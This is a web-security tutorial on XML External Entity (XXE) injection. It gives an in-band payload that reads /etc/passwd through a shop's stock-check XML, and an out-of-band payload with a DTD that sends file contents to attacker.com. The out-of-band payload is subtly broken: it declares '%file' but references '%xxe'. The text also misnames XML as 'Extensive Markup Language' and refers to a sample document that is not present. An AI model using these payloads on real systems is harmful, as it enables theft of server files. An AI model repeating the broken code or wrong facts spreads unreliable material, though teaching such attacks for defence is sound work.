External Entity Injection is a type of security vulnerability that allows the attacker to manipulate the way a web application processes the XML data. The attack occurs when a misconfigured XML parser processes an XML input containing references to an external resource. A bit different than SQL Injection but it does have some common themes. The attacker takes advantage of the vulnerability by embedding malicious inline DOCTYPE definition in the XML data.
In this article, we will have a thorough look at the XML and the different types of External Entity Injection attack i.e, Normal and Out-of-band XXE attacks. We will also cover different ways to suspect whether an application is vulnerable to an XXE attack or not, and a practical example of how we can use external entities to retrieve sensitive files from a vulnerable server.
What is XML?
XML is designed to transport and store data and it separates the information from the presentation. We can organize our information and exactly understand what the information is about using XML. A sample XML document is as follows:

XML doesn’t have its pre-defined tags like HTML, so we use our own tags to describe the data or whatever information we have. In the above document, we have different tags i.e, book id, author of the book, title of the book, price of the book, publishing date of the book, and the description of the book. All of this information is human readable and when a normal person reads it, he can easily tell what this information is about. That is what XML is designed to do i.e, storing and transporting information in a meaningful way. It is called Extensive Markup Language which means that we can create tags with the names we want so that it would present the data as meaningfully as possible. Unlike the HTML which has its own tags, XML is not used to display the information it stores, there is Javascript, CSS and HTML for that functionality
Nodes that are under the same tree level are called siblings. For example, in the above case the tags author, title, genre, description, and publish_date are under the same tree level and have the same amount of indentation. And they are the child of the root element i.e, book_id. This is called XML logical structure which further organizes our data


The opening and closing of the nodes come in very handy in order to navigate the displayed information easily. The information stored in an XML document can also be transported across the web services.
XXE
XXE is a vulnerability that attackers exploit due to a misconfiguration in the XML parser. It is the most common type of XXE attack which is generally used to retrieve the sensitive files or even get the reverse shell on the system. There are three major steps of an XXE attack:
- If XML is in the request, declare a local entity
- Reference the entity in an existing XML element
- If both of these steps worked fine, start the exploitation process by retrieving the sensitive files
XML allows for the declaration of the entities which are the references to other points in an XML document. External entities are similar to the local entities, it’s just that in the case of external entities instead of referencing something from the XML document, we reference something external. For example, a URI scheme can be used and we reference some sensitive files, so we can leverage the XML parser misconfiguration to force the application to fetch the file content. Now we will look at performing the above steps on a vulnerable application in the same order to retrieve a “/etc/passwd” file from a server. First of all, we will find out that the XML payload is being set in a stock check function of a shopping website.

Now we try to declare a doctype and within that doc type, we will declare an entity i.e, <!DOCTYPE test [ <!ENTITY xxe “test”> ]>
. Let’s see what happens after we declare the entity xxe.

The application is not throwing an error. Now we will reference our declared entity i.e, “xxe” in an existing XML element.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>

We can see that the XML parser processed our XML, and wherever we have declared our malicious “XXE” entity, it was referencing the contents of “//etc/passwd”. Our attack has been successful and we have retrieved the contents of “//etc/passwd” successfully.
Out-of Band XXE
Out-of-band XXE attacks are similar to the normal XXE attacks, the only difference is that the attacker tries to make an additional XXE request to his controlled server, unlike normal XXE attacks where he gets the response immediately in the same band. An application may be vulnerable to these types of attacks in case of suspecting:
- Tainted Data within the Document Type Declaration (DTD) Identifier.
- Web application parses XML documents
- XML Processor Validates and Processes DTD
Out-of-Band XXE attacks can have the same amount of impact as normal XXE attacks.
Request:
POST http://targeturl.com/vulnerable
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe[
<!ENTITY % file SYSTEM
"file:///etc/passwd">
<!ENTITY % dtd SYSTEM
"http://attacker.com/malicious.dtd">
%dtd;
]>
<xee>&send;</xee>
Attacker DTD (attacker.com/malicious.dtd)
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?store=%xxe;'>">
%all;
The attack will take place in the following steps.
Firstly the “%xxe” parameter entity will be processed to load the “//etc/passwd” file. Such that a request is made to “http://attacker.com/malicious.dtd” and the attacker’s DTD file is processed. The %all parameter entity will create an entity called &send containing a URL. That URL will have the contents of the “//etc/passwd” file. Now, when the URL is constructed, the &send entity will be processed making a request to the attacker’s server. On his controlled server, the attacker can reconstruct the “//etc/passwd” file from the log entry successfully.
Conclusion:
XXE attacks are one of the most common attacks in the web applications that use XML parsers. XXE vulnerabilities can have many severe impacts and both In-band and Out-of-band External Entity Injection attacks can lead to attacks like Server Side Request Forgery (SSRF), causing a Denial of Service (DOS) Attack, retrieval of sensitive files, etc.
XXE attacks can be mitigated to a great extent by taking some protective measures like disabling features that are making the XML processor weak, analyzing the XML parsing library of the web application, and disabling external entity features like DTD and XML that make the application vulnerable.